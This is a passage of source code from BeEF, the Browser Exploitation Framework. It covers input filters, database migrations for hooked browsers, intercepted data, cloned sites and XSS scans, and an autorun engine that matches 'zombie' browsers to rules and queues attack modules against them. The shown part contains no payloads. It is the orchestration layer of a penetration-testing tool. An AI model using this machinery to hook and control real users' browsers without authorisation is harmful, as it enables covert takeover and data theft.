# @param [String] str String for testing
# @return [Boolean] If the string only contains numbers
def self.nums_only?(str)
return false unless is_non_empty_string?(str)
only?('0-9', str)
end
# Check if valid float
# @param [String] str String for float testing
# @return [Boolean] If the string is a valid float
def self.is_valid_float?(str)
return false unless is_non_empty_string?(str)
return false unless only?('0-9\.', str)
!(str =~ /^\d+\.\d+$/).nil?
end
# Check if hex characters only
# @param [String] str String for testing
# @return [Boolean] If the string only contains hex characters
def self.hexs_only?(str)
return false unless is_non_empty_string?(str)
only?('0123456789ABCDEFabcdef', str)
end
# Check if first character is a number
# @param [String] String for testing
# @return [Boolean] If the first character of the string is a number
def self.first_char_is_num?(str)
return false unless is_non_empty_string?(str)
!(str =~ /^\d.*/).nil?
end
# Check for space characters: \t\n\r\f
# @param [String] str String for testing
# @return [Boolean] If the string has a whitespace character
def self.has_whitespace_char?(str)
return false unless is_non_empty_string?(str)
exists?('\s', str)
end
# Check for non word characters: a-zA-Z0-9
# @param [String] str String for testing
# @return [Boolean] If the string only has alphanums
def self.alphanums_only?(str)
return false unless is_non_empty_string?(str)
only?('a-zA-Z0-9', str)
end
# @overload self.is_valid_ip?(ip, version)
# Checks if the given string is a valid IP address
# @param [String] ip string to be tested
# @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
# @return [Boolean] true if the string is a valid IP address, otherwise false
#
# @overload self.is_valid_ip?(ip)
# Checks if the given string is either a valid IPv4 or IPv6 address
# @param [String] ip string to be tested
# @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
def self.is_valid_ip?(ip, version = :both)
return false unless is_non_empty_string?(ip)
if case version.inspect.downcase
when /^:ipv4$/
ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
when /^:ipv6$/
ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
([0-9a-f]{1,4}:){1,7}:|
([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
[0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
:((:[0-9a-f]{1,4}){1,7}|:)|
fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
::(ffff(:0{1,4}){0,1}:){0,1}
((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
([0-9a-f]{1,4}:){1,4}:
((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
when /^:both$/
is_valid_ip?(ip, :ipv4) || is_valid_ip?(ip, :ipv6)
end
true
else
false
end
end
# Checks if the given string is a valid private IP address
# @param [String] ip string for testing
# @return [Boolean] true if the string is a valid private IP address, otherwise false
# @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8, but does not include local-link addresses.
def self.is_valid_private_ip?(ip)
return false unless is_valid_ip?(ip)
ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
end
# Checks if the given string is a valid TCP port
# @param [String] port string for testing
# @return [Boolean] true if the string is a valid TCP port, otherwise false
def self.is_valid_port?(port)
valid = false
valid = true if port.to_i > 0 && port.to_i < 2**16
valid
end
# Checks if string is a valid domain name
# @param [String] domain string for testing
# @return [Boolean] If the string is a valid domain name
# @note Only validates the string format. It does not check for a valid TLD since ICANN's list of TLD's is not static.
def self.is_valid_domain?(domain)
return false unless is_non_empty_string?(domain)
return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
false
end
# Check for valid browser details characters
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser details characters
# @note This function passes the \302\256 character which translates to the registered symbol (r)
def self.has_valid_browser_details_chars?(str)
return false unless is_non_empty_string?(str)
(str =~ %r{[^\w\d\s()-.,;:_/!\302\256]}).nil?
end
# Check for valid base details characters
# @param [String] str String for testing
# @return [Boolean] If the string has only valid base characters
# @note This is for basic filtering where possible all specific filters must be implemented
# @note This function passes the \302\256 character which translates to the registered symbol (r)
def self.has_valid_base_chars?(str)
return false unless is_non_empty_string?(str)
(str =~ /[^\302\256[:print:]]/).nil?
end
# Verify the yes and no is valid
# @param [String] str String for testing
# @return [Boolean] If the string is either 'yes' or 'no'
def self.is_valid_yes_no?(str)
return false if has_non_printable_char?(str)
return false if str !~ /\A(Yes|No)\z/i
true
end
end
end
================================================
FILE: core/filters/browser.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
# Check the browser type value - for example, 'FF'
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser name characters
def self.is_valid_browsername?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if str.length > 2
return false unless has_valid_browser_details_chars?(str)
true
end
# Check the Operating System name value - for example, 'Windows XP'
# @param [String] str String for testing
# @return [Boolean] If the string has valid Operating System name characters
def self.is_valid_osname?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false unless has_valid_browser_details_chars?(str)
return false if str.length < 2
true
end
# Check the Hardware name value - for example, 'iPhone'
# @param [String] str String for testing
# @return [Boolean] If the string has valid Hardware name characters
def self.is_valid_hwname?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false unless has_valid_browser_details_chars?(str)
return false if str.length < 2
true
end
# Verify the browser version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters
def self.is_valid_browserversion?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return true if str.eql? 'UNKNOWN'
return true if str.eql? 'ALL'
return false if !nums_only?(str) && !str.match(/\A(0|[1-9][0-9]{0,3})(\.(0|[1-9][0-9]{0,3})){0,3}\z/)
return false if str.length > 20
true
end
# Verify the os version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid os version characters
def self.is_valid_osversion?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return true if str.eql? 'UNKNOWN'
return true if str.eql? 'ALL'
return false unless BeEF::Filters.only?('a-zA-Z0-9.<=> ', str)
return false if str.length > 20
true
end
# Verify the browser/UA string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser / ua string characters
def self.is_valid_browserstring?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false unless has_valid_browser_details_chars?(str)
return false if str.length > 300
true
end
# Verify the cookies are valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid cookie characters
def self.is_valid_cookies?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 2000
true
end
# Verify the system platform is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid system platform characters
def self.is_valid_system_platform?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false unless has_valid_browser_details_chars?(str)
return false if str.length > 200
true
end
# Verify the date stamp is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid date stamp characters
def self.is_valid_date_stamp?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the CPU type string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid CPU type characters
def self.is_valid_cpu?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the memory string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid memory type characters
def self.is_valid_memory?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the GPU type string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid GPU type characters
def self.is_valid_gpu?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the browser_plugins string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser plugin characters
# @note This string can be empty if there are no browser plugins
# @todo Verify if the ruby version statement is still necessary
def self.is_valid_browser_plugins?(str) # rubocop:disable Naming/PredicatePrefix
return false unless is_non_empty_string?(str)
return false if str.length > 1000
if str.encoding == Encoding.find('UTF-8') # Style/CaseEquality: Avoid the use of the case equality operator `===`.
(str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else
(str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end
end
end
end
================================================
FILE: core/filters/command.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
# Check if the string is a valid path from a HTTP request
# @param [String] str String for testing
# @return [Boolean] If the string has valid path characters
def self.is_valid_path_info?(str)
return false if str.nil?
return false unless str.is_a? String
return false if has_non_printable_char?(str)
true
end
# Check if the session id valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid hook session id characters
def self.is_valid_hook_session_id?(str)
return false unless is_non_empty_string?(str)
return false unless has_valid_key_chars?(str)
true
end
# Check if valid command module datastore key
# @param [String] str String for testing
# @return [Boolean] If the string has valid command module datastore key characters
def self.is_valid_command_module_datastore_key?(str)
return false unless is_non_empty_string?(str)
return false unless has_valid_key_chars?(str)
true
end
# Check if valid command module datastore value
# @param [String] str String for testing
# @return [Boolean] If the string has valid command module datastore param characters
def self.is_valid_command_module_datastore_param?(str)
return false if has_null?(str)
return false unless has_valid_base_chars?(str)
true
end
# Check for word and some punc chars
# @param [String] str String for testing
# @return [Boolean] If the string has valid key characters
def self.has_valid_key_chars?(str)
return false unless is_non_empty_string?(str)
return false unless has_valid_base_chars?(str)
true
end
# Check for word and underscore chars
# @param [String] str String for testing
# @return [Boolean] If the sting has valid param characters
def self.has_valid_param_chars?(str)
return false if str.nil?
return false unless str.is_a? String
return false if str.empty?
return false unless (str =~ /[^\w_:]/).nil?
true
end
end
end
================================================
FILE: core/filters/http.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
# Verify the hostname string is valid
# @param [String] str String for testing
# @return [Boolean] If the string is a valid hostname
def self.is_valid_hostname?(str)
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 255
return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-.]*[a-zA-Z0-9]$/).nil?
true
end
def self.is_valid_verb?(verb)
%w[HEAD GET POST OPTIONS PUT DELETE].each { |v| return true if verb.eql? v }
false
end
def self.is_valid_url?(uri)
return true unless uri.nil?
# OPTIONS * is not yet supported
# return true if uri.eql? "*"
# TODO : CHECK THE normalize_path method and include it somewhere (maybe here)
# return true if uri.eql? self.normalize_path(uri)
false
end
def self.is_valid_http_version?(version)
# from browsers the http version contains a space at the end ("HTTP/1.0\r")
version.gsub!(/\r+/, '')
['HTTP/1.0', 'HTTP/1.1'].each { |v| return true if version.eql? v }
false
end
def self.is_valid_host_str?(host_str)
# from browsers the host header contains a space at the end
host_str.gsub!(/\r+/, '')
return true if 'Host:'.eql?(host_str)
false
end
def normalize_path(path)
print_error "abnormal path `#{path}'" if path[0] != '/'
ret = path.dup
ret.gsub!(%r{/+}o, '/') # // => /
while ret.sub!(%r{/\.(?:/|\Z)}, '/'); end # /. => /
while ret.sub!(%r{/(?!\.\./)[^/]+/\.\.(?:/|\Z)}, '/'); end # /foo/.. => /foo
print_error "abnormal path `#{path}'" if %r{/\.\.(/|\Z)} =~ ret
ret
end
end
end
================================================
FILE: core/filters/page.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
# Verify the page title string is valid
# @param [String] str String for testing
# @return [Boolean] If the string is a valid page title
def self.is_valid_pagetitle?(str)
return false unless str.is_a? String
return false if has_non_printable_char?(str)
return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
true
end
# Verify the page referrer string is valid
# @param [String] str String for testing
# @return [Boolean] If the string is a valid referrer
def self.is_valid_pagereferrer?(str)
return false unless str.is_a? String
return false if has_non_printable_char?(str)
return false if str.length > 350
true
end
end
end
================================================
FILE: core/filters.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
end
end
# @note Include the filters
require 'core/filters/base'
require 'core/filters/browser'
require 'core/filters/command'
require 'core/filters/page'
require 'core/filters/http'
================================================
FILE: core/hbmanager.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module HBManager
# Get hooked browser by session id
# @param [String] sid hooked browser session id string
# @return [BeEF::Core::Models::HookedBrowser] returns the associated Hooked Browser
def self.get_by_session(sid)
BeEF::Core::Models::HookedBrowser.where(session: sid).first
end
# Get hooked browser by id
# @param [Integer] id hooked browser database id
# @return [BeEF::Core::Models::HookedBrowser] returns the associated Hooked Browser
def self.get_by_id(id)
BeEF::Core::Models::HookedBrowser.find(id)
end
end
end
================================================
FILE: core/loader.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# @note Include here all the gems we are using
require 'rubygems'
require 'bundler/setup'
# For some reason, on Ruby 2.5+, msgpack needs to be loaded first,
# else metasploit integration dies due to undefined `to_msgpack`.
# Works fine on Ruby 2.4
require 'msgpack'
Bundler.require(:default)
require 'cgi'
require 'yaml'
require 'singleton'
require 'ipaddr'
require 'base64'
require 'xmlrpc/client'
require 'openssl'
require 'eventmachine'
require 'thin'
require 'rack'
require 'em-websocket'
require 'uglifier'
require 'execjs'
require 'ansi'
require 'term/ansicolor'
require 'json'
require 'otr-activerecord'
require 'parseconfig'
require 'erubis'
require 'mime/types'
require 'optparse'
require 'resolv'
require 'digest'
require 'zip'
require 'logger'
# @note Logger
require 'core/logger'
# @note Include the filters
require 'core/filters'
# @note Include our patches for ruby and gems
require 'core/ruby'
# @note Include the API
require 'core/api'
# @note Include the settings
require 'core/settings'
# @note Include the core of BeEF
require 'core/core'
================================================
FILE: core/logger.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
#
# @note log to file
#
module BeEF
class << self
attr_writer :logger
def logger
@logger ||= Logger.new("#{$home_dir}/beef.log").tap do |log|
log.progname = name
log.level = Logger::WARN
end
end
end
end
================================================
FILE: core/main/ar-migrations/001_create_command_modules.rb
================================================
class CreateCommandModules < ActiveRecord::Migration[6.0]
def change
create_table :command_modules do |t|
t.text :name
t.text :path
end
end
end
================================================
FILE: core/main/ar-migrations/002_create_hooked_browsers.rb
================================================
class CreateHookedBrowsers < ActiveRecord::Migration[6.0]
def change
create_table :hooked_browsers do |t|
t.text :session
t.text :ip
t.text :firstseen
t.text :lastseen
t.text :httpheaders
t.text :domain
t.integer :port
t.integer :count
t.boolean :is_proxy
end
end
end
================================================
FILE: core/main/ar-migrations/003_create_logs.rb
================================================
class CreateLogs < ActiveRecord::Migration[6.0]
def change
create_table :logs do |t|
t.text :logtype
t.text :event
t.datetime :date
t.references :hooked_browser
end
end
end
================================================
FILE: core/main/ar-migrations/004_create_commands.rb
================================================
class CreateCommands < ActiveRecord::Migration[6.0]
def change
create_table :commands do |t|
t.references :command_module
t.references :hooked_browser
t.text :data
t.datetime :creationdate
t.text :label
t.boolean :instructions_sent, default: false
end
end
end
================================================
FILE: core/main/ar-migrations/005_create_results.rb
================================================
class CreateResults < ActiveRecord::Migration[6.0]
def change
create_table :results do |t|
t.references :command
t.references :hooked_browser
t.datetime :date
t.integer :status
t.text :data
end
end
end
================================================
FILE: core/main/ar-migrations/006_create_option_caches.rb
================================================
class CreateOptionCaches < ActiveRecord::Migration[6.0]
def change
create_table :option_caches do |t|
t.text :name
t.text :value
end
end
end
================================================
FILE: core/main/ar-migrations/007_create_browser_details.rb
================================================
class CreateBrowserDetails < ActiveRecord::Migration[6.0]
def change
create_table :browser_details do |t|
t.text :session_id
t.text :detail_key
t.text :detail_value
end
end
end
================================================
FILE: core/main/ar-migrations/008_create_executions.rb
================================================
class CreateExecutions < ActiveRecord::Migration[6.0]
def change
create_table :executions do |t|
t.text :session_id
t.integer :mod_count
t.integer :mod_successful
t.text :mod_body
t.text :exec_time
t.text :rule_token
t.boolean :is_sent
t.integer :rule_id
end
end
end
================================================
FILE: core/main/ar-migrations/009_create_rules.rb
================================================
class CreateRules < ActiveRecord::Migration[6.0]
def change
create_table :rules do |t|
t.text :name
t.text :author
t.text :browser
t.text :browser_version
t.text :os
t.text :os_version
t.text :modules
t.text :execution_order
t.text :execution_delay
t.text :chain_mode
end
end
end
================================================
FILE: core/main/ar-migrations/010_create_interceptor.rb
================================================
class CreateInterceptor < ActiveRecord::Migration[6.0]
def change
create_table :interceptors do |t|
t.text :ip
t.text :post_data
end
end
end
================================================
FILE: core/main/ar-migrations/011_create_web_cloner.rb
================================================
class CreateWebCloner < ActiveRecord::Migration[6.0]
def change
create_table :web_cloners do |t|
t.text :uri
t.text :mount
end
end
end
================================================
FILE: core/main/ar-migrations/013_create_network_host.rb
================================================
class CreateNetworkHost < ActiveRecord::Migration[6.0]
def change
create_table :network_hosts do |t|
t.references :hooked_browser
t.text :ip
t.text :hostname
t.text :ntype
t.text :os
t.text :mac
t.text :lastseen
end
end
end
================================================
FILE: core/main/ar-migrations/014_create_network_service.rb
================================================
class CreateNetworkService < ActiveRecord::Migration[6.0]
def change
create_table :network_services do |t|
t.references :hooked_browser
t.text :proto
t.text :ip
t.text :port
t.text :ntype
end
end
end
================================================
FILE: core/main/ar-migrations/015_create_http.rb
================================================
class CreateHttp < ActiveRecord::Migration[6.0]
def change
create_table :https do |t|
t.text :hooked_browser_id
# The http request to perform. In clear text.
t.text :request
# Boolean value as string to say whether cross-origin requests are allowed
t.boolean :allow_cross_origin, default: true
# The http response body received. In clear text.
t.text :response_data
# The http response code. Useful to handle cases like 404, 500, 302, ...
t.integer :response_status_code
# The http response code. Human-readable code: success, error, ecc..
t.text :response_status_text
# The port status. closed, open or not http
t.text :response_port_status
# The XHR Http response raw headers
t.text :response_headers
# The http response method. GET or POST.
t.text :method
# The content length for the request.
t.text :content_length, default: 0
# The request protocol/scheme (http/https)
t.text :proto
# The domain on which perform the request.
t.text :domain
# The port on which perform the request.
t.text :port
# Boolean value to say if the request was cross-origin
t.text :has_ran, default: 'waiting'
# The path of the request.
# Example: /secret.html
t.text :path
# The date at which the http response has been saved.
t.datetime :response_date
# The date at which the http request has been saved.
t.datetime :request_date
end
end
end
================================================
FILE: core/main/ar-migrations/016_create_rtc_status.rb
================================================
class CreateRtcStatus < ActiveRecord::Migration[6.0]
def change
create_table :rtc_statuss do |t|
t.references :hooked_browser
t.integer :target_hooked_browser_id
t.text :status
end
end
end
================================================
FILE: core/main/ar-migrations/017_create_rtc_manage.rb
================================================
class CreateRtcManage < ActiveRecord::Migration[6.0]
def change
create_table :rtc_manages do |t|
t.references :hooked_browser
t.text :message
t.text :has_sent, default: 'waiting'
end
end
end
================================================
FILE: core/main/ar-migrations/018_create_rtc_signal.rb
================================================
class CreateRtcSignal < ActiveRecord::Migration[6.0]
def change
create_table :rtc_signals do |t|
t.references :hooked_browser
t.integer :target_hooked_browser_id
t.text :signal
t.text :has_sent, default: 'waiting'
end
end
end
================================================
FILE: core/main/ar-migrations/019_create_rtc_module_status.rb
================================================
class CreateRtcModuleStatus < ActiveRecord::Migration[6.0]
def change
create_table :rtc_module_statuss do |t|
t.references :hooked_browser
t.references :command_module
t.integer :target_hooked_browser_id
t.text :status
end
end
end
================================================
FILE: core/main/ar-migrations/020_create_xssrays_detail.rb
================================================
class CreateXssraysDetail < ActiveRecord::Migration[6.0]
def change
create_table :xssraysdetails do |t|
t.references :hooked_browser
t.text :vector_name
t.text :vector_method
t.text :vector_poc
end
end
end
================================================
FILE: core/main/ar-migrations/021_create_dns_rule.rb
================================================
class CreateDnsRule < ActiveRecord::Migration[6.0]
def change
create_table :dns_rules do |t|
t.text :pattern
t.text :resource
t.text :response
t.text :callback
end
end
end
================================================
FILE: core/main/ar-migrations/024_create_autoloader.rb
================================================
class CreateAutoloader < ActiveRecord::Migration[6.0]
def change
create_table :autoloaders do |t|
t.references :command
t.boolean :in_use
end
end
end
================================================
FILE: core/main/ar-migrations/025_create_xssrays_scan.rb
================================================
class CreateXssraysScan < ActiveRecord::Migration[6.0]
def change
create_table :xssraysscans do |t|
t.references :hooked_browser
t.datetime :scan_start
t.datetime :scan_finish
t.text :domain
t.text :cross_origin
t.integer :clean_timeout
t.boolean :is_started
t.boolean :is_finished
end
end
end
================================================
FILE: core/main/autorun_engine/engine.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
class Engine
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@result_poll_interval = @config.get('beef.autorun.result_poll_interval')
@result_poll_timeout = @config.get('beef.autorun.result_poll_timeout')
@continue_after_timeout = @config.get('beef.autorun.continue_after_timeout')
@debug_on = @config.get('beef.debug')
@VERSION = ['<', '<=', '==', '>=', '>', 'ALL']
@VERSION_STR = %w[XP Vista 7]
end
# Checks if there are any ARE rules to be triggered for the specified hooked browser.
#
# Returns an array with rule IDs that matched and should be triggered.
# if rule_id is specified, checks will be executed only against the specified rule (useful
# for dynamic triggering of new rulesets ar runtime)
def find_matching_rules_for_zombie(browser, browser_version, os, os_version)
rules = BeEF::Core::Models::Rule.all
return if rules.nil?
return if rules.empty?
# TODO: handle cases where there are multiple ARE rules for the same hooked browser.
# maybe rules need to have priority or something?
print_info '[ARE] Checking if any defined rules should be triggered on target.'
match_rules = []
rules.each do |rule|
next unless zombie_matches_rule?(browser, browser_version, os, os_version, rule)
match_rules.push(rule.id)
print_more("Hooked browser and OS match rule: #{rule.name}.")
end
print_more("Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser.")
match_rules
end
# @return [Boolean]
# Note: browser version checks are supporting only major versions, ex: C 43, IE 11
# Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
def zombie_matches_rule?(browser, browser_version, os, os_version, rule)
return false if rule.nil?
unless zombie_browser_matches_rule?(browser, browser_version, rule)
print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : does not match")
return false
end
print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : matched")
unless zombie_os_matches_rule?(os, os_version, rule)
print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): does not match")
return false
end
print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): matched")
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# @return [Boolean]
# TODO: This should be updated to support matching multiple OS (like the browser check below)
def zombie_os_matches_rule?(os, os_version, rule)
return false if rule.nil?
return false unless rule.os == 'ALL' || os == rule.os
# check if the OS versions match
os_ver_rule_cond = rule.os_version.split(' ').first
return true if os_ver_rule_cond == 'ALL'
return false unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
if os_ver_rule_maj == 'XP'
os_ver_rule_maj = 5
os_ver_rule_min = 0
elsif os_ver_rule_maj == 'Vista'
os_ver_rule_maj = 6
os_ver_rule_min = 0
elsif os_ver_rule_maj == '7'
os_ver_rule_maj = 6
os_ver_rule_min = 0
end
# Most of the times Linux/*BSD OS doesn't return any version
# (TODO: improve OS detection on these operating systems)
if !os_version.nil? && !@VERSION_STR.include?(os_version)
os_ver_hook_maj = os_version.split('.').first
os_ver_hook_min = os_version.split('.').last
# the following assignments to 0 are need for later checks like:
# 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
os_ver_hook_min = 0 if os_version.split('.').length == 1
os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
else
# XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
# TODO: BUG: This will fail horribly if the target OS is Windows 7 or newer,
# as no version normalization is performed.
# TODO: Update this for every OS since Vista/7 ...
if os_version == 'XP'
os_ver_hook_maj = 5
os_ver_hook_min = 0
elsif os_version == 'Vista'
os_ver_hook_maj = 6
os_ver_hook_min = 0
elsif os_version == '7'
os_ver_hook_maj = 6
os_ver_hook_min = 0
end
end
if !os_version.nil? || rule.os_version != 'ALL'
os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
return false unless (os_major_version_match && os_minor_version_match)
end
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# @return [Boolean]
def zombie_browser_matches_rule?(browser, browser_version, rule)
return false if rule.nil?
b_ver_cond = rule.browser_version.split(' ').first
return false unless @VERSION.include?(b_ver_cond)
b_ver = rule.browser_version.split(' ').last
return false unless BeEF::Filters.is_valid_browserversion?(b_ver)
# check if rule specifies multiple browsers
if rule.browser =~ /\A[A-Z]+\Z/
return false unless rule.browser == 'ALL' || browser == rule.browser
# check if the browser version matches
browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
return false unless browser_version_match
else
browser_match = false
rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
if b == browser || b == 'ALL'
browser_match = true
break
end
end
return false unless browser_match
end
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# Check if the hooked browser type/version and OS type/version match any Rule-sets
# stored in the BeEF::Core::Models::Rule database table
# If one or more Rule-sets do match, trigger the module chain specified
def find_and_run_all_matching_rules_for_zombie(hb_id)
return if hb_id.nil?
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb_id, 'browser.name')
browser_version = hb_details.get(hb_id, 'browser.version')
os_name = hb_details.get(hb_id, 'host.os.name')
os_version = hb_details.get(hb_id, 'host.os.version')
are = BeEF::Core::AutorunEngine::Engine.instance
rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
return if rules.nil?
return if rules.empty?
are.run_rules_on_zombie(rules, hb_id)
end
# Run the specified rule IDs on the specified zombie ID
# only if the rules match.
def run_matching_rules_on_zombie(rule_ids, hb_id)
return if rule_ids.nil?
return if hb_id.nil?
rule_ids = [rule_ids.to_i] if rule_ids.is_a?(String)
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb_id, 'browser.name')
browser_version = hb_details.get(hb_id, 'browser.version')
os_name = hb_details.get(hb_id, 'host.os.name')
os_version = hb_details.get(hb_id, 'host.os.version')
are = BeEF::Core::AutorunEngine::Engine.instance
rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
return if rules.nil?
return if rules.empty?
new_rules = []
rules.each do |rule|
new_rules << rule if rule_ids.include?(rule)
end
return if new_rules.empty?
are.run_rules_on_zombie(new_rules, hb_id)
end
# Run the specified rule IDs on the specified zombie ID
# regardless of whether the rules match.
# Prepare and return the JavaScript of the modules to be sent.
# It also updates the rules ARE execution table with timings
def run_rules_on_zombie(rule_ids, hb_id)
return if rule_ids.nil?
return if hb_id.nil?
hb = BeEF::HBManager.get_by_id(hb_id)
hb_session = hb.session
rule_ids = [rule_ids] if rule_ids.is_a?(Integer)
rule_ids.each do |rule_id|
rule = BeEF::Core::Models::Rule.find(rule_id)
modules = JSON.parse(rule.modules)
execution_order = JSON.parse(rule.execution_order)
execution_delay = JSON.parse(rule.execution_delay)
chain_mode = rule.chain_mode
unless %w[sequential nested-forward].include?(chain_mode)
print_error("[ARE] Invalid chain mode '#{chain_mode}' for rule")
return
end
mods_bodies = []
mods_codes = []
mods_conditions = []
# this ensures that if both rule A and rule B call the same module in sequential mode,
# execution will be correct preventing wrapper functions to be called with equal names.
rule_token = SecureRandom.hex(5)
modules.each do |cmd_mod|
mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
options = []
replace_input = false
cmd_mod['options'].each do |k, v|
options.push({ 'name' => k, 'value' => v })
replace_input = true if v == '<<mod_input>>'
end
command_body = prepare_command(mod, options, hb_id, replace_input, rule_token)
